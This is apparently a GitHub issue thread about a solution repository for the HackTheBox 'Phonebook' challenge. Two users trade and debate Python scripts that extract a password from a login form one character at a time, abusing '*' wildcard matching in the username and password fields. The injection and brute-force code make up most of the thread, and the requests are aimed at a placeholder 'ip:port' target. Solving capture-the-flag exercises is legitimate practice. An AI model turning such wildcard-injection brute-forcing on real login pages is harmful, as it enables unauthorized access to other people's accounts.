### ISSUE TITLE
Code change suggestion

### ISSUE THREAD

**Issue by FelixSelter** [jmlgomez73/Phonebook-Challenge-HackTheBox#1]
Why that complicated?
```
import requests
import string

target = "http://ip:port/"
url = "http://ip:port/login"

username = "Reese"
password = ""



while True:
    found = False

    for character in string.printable.replace("*",""):
        response = requests.post(url=url, data=dict(username="Reese", password=password+character+"*"))
        if response.url == target:
            found=True
            password+=character
            print(character)

    if not found:
        break

print(password)
```

**Comment by jmlgomez73** [comment]
This code doesn't work, you do not check the success status of when introducing the payload at login.
```
success_user = requests.post(target,data={'username':'*','password':"*"}).text
fail_user = requests.post(target,data={'username':"a",'password':"a"}).text
```
Anyway you don't know the username so for more information it is also cracked.
Anyway the substitution of my input data by string.printable, will be implemented to save lines.

Thank you very much for your contribution.

**Comment by FelixSelter** [comment]
Its working. If you had run it you had seen. I assumed the username is clear due to the message on the page. If this doesnt satisfie you can include a basic bool where to enter the payload

Checking for success is done via if response.url == target

Thanks for letting me contribute
